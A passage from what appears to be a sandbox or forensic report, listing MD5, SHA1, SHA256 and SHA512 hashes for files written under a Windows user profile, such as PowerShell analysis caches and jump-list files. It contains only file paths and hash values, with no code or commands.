SHA256b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5c008a7109e1fd48e0bd355b48e5f1cb1
SHA1f787117f9f2bc2f028bbadb91c5e380b878a543c
SHA256f8ba96e3e623cb6df137f6b53a762436f4540457a28af7ded4f60619681532fc
SHA512c44179881d77fb02e810f607e93808c7aa46e6ae8e052af0256ee080ec245cea1566bf96fba9a21819852c21e289e6447b3a7f776a846eab86fc37e1cf20da83
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5769ef594cd0a843e00090c6fecadab45
SHA185c569f48789bb81d2c05bef3dd7c5a220a3f0c1
SHA256949e1d7425271f57846aeb5ab55433873e88194784cfa1c17121f0eda3f7111f
SHA512d1d527cd3c6a65342f539cc709a235ad33fc57f452639b1894567ef3124ecdccf5d6f0dede036994d6a9bd61d6b660dca864c769c5446d2eee420bb5672f8a27
-
MD5
9a8a206ea9cd39afe5b0ecb360d1005d
SHA196a3c300914c4fb89164d0d75f679af68ad33231
SHA256dac46888edc5ed3945928be27c9d7081db41dd2f0379c791f95c06939c924747
SHA51223b68c284a6f8a95f87dfedc97439c87c1764fde3b4e14b2731d29fe598537fc25a640e1744f4a743f09f89dc4accdc12d2f385525856ae3d456f690b7054605
-
MD5
a2d85d73bc9f75acf57ae7097e4d82b8
SHA150072e001cb14caf69e0335e0e032eff874e36fd
SHA256a182e0235d6dfc5fd236e234ba7a6ea0600055e08afe98f13e2c975abf407688
SHA512ea202f411c0c7598b16c4ff817575f46ae348741a5fd3eef1323edba87a887d411452117a88fdf88db074578390ab489447a2388cc2de298caa02f2fc027a1c3
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
6938a2a0fa3adc1ab9cc3bb479ff0e74
SHA137e2117cf83cdf1a631a394ce6f0c57f70ee3f47
SHA256df16833eb7975ca070466bf2f655e078508a59968d8f50f14a8ff7873008d068
SHA5125509bae8342bfc482a671258fe3012247f89b2449e84f6c42a4dd0bc73cd4177fff6d581c3615214fc0b5f115a77e24213c5dd37f8c0631eb9064349c33eec79
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD502ea34fbf719b7b6f1055fb17cb162f1
SHA1a00c169663cf054cdadbb3660cea719fce378629
SHA2569e96f6f575028ce97550afc0f16beca271d497c0b39edf2d777332e9858d0eba
SHA512fc3433461f22ae6f85a46e41eaef2ec2e62172164265608b75be428438da25ad17daf5ed77ff79cea367a46e3d872b83d7999a2aca027959a2e3547213883e92
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD502ea34fbf719b7b6f1055fb17cb162f1
SHA1a00c169663cf054cdadbb3660cea719fce378629
SHA2569e96f6f575028ce97550afc0f16beca271d497c0b39edf2d777332e9858d0eba
SHA512fc3433461f22ae6f85a46e41eaef2ec2e62172164265608b75be428438da25ad17daf5ed77ff79cea367a46e3d872b83d7999a2aca027959a2e3547213883e92
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD502ea34fbf719b7b6f1055fb17cb162f1
SHA1a00c169663cf054cdadbb3660cea719fce378629
SHA2569e96f6f575028ce97550afc0f16beca271d497c0b39edf2d777332e9858d0eba
SHA512fc3433461f22ae6f85a46e41eaef2ec2e62172164265608b75be428438da25ad17daf5ed77ff79cea367a46e3d872b83d7999a2aca027959a2e3547213883e92
-
MD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
29e2677a3fddc6260763cf8589ac417b
SHA19661e6ed382324ce815ee63469476bbe4ac55bed
SHA2562e3313081f093b53d0ae0f2dd033fce611d06a632c006266b1e81026099ccb5a
SHA512b163a93e4d0677ab94d7ed0c5713e242d20dc75d5b0d3134621d7068a3f0e9eca126bf734a09bdc1c4ae4371cd0bec94e11025ad15927a7a96556deb27c120b0
-
MD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
MD5
4414efc59036936d52f17f623bcd4d0c
SHA13febac8df46fd9ad4e6205589d168aeb2fc7cba4
SHA256464b821bea8710171853db0073f3d6913fbcc9d78066a9fe1946c35f78d382be
SHA5123249ea462fa277c0fa219cf58b17e19dbe21f63970c38192c2098e665f509b12281d4dbbfa6997ed25f416e19d3fd5614cf29f9549ccd69fcd90494ae631a4c9
-
MD5
70d1bf1c7a95f0613358ac07bc3864ad
SHA152783a6ace472471ad68b602c604e48340737596
SHA25688e639c34e7798f2e51a121db7e0dedc7c5f4bfa95963bb5c93bcb221e0127c3
SHA512ed5e46ee00e735ca09c5cf4dfed311a4229ff08e9d626c1afa2ed6cc7543f8808259f9553666844ebf25d775b20af0a9bafe59c3b525a6918db1e8c7f70e4fb5
-
MD5
58b4c6a70f55d70a401015da300261b2
SHA1a13b8a1a577c3638c311f5e668b61cea8a532d35
SHA2569eaa1a087f7aaa768134c540941584fdc2cd8d050b375a36ded9d1cdf7fb7fe0
SHA5120ae4aaf9f6383b752b824f86e9ae10983e9f00df9868efa3a1c5e1f2bfae062e43458260c7a379b7d6f711f4ef6a6f22035cc4cd21d7ba1b3c7a5e10f8f06289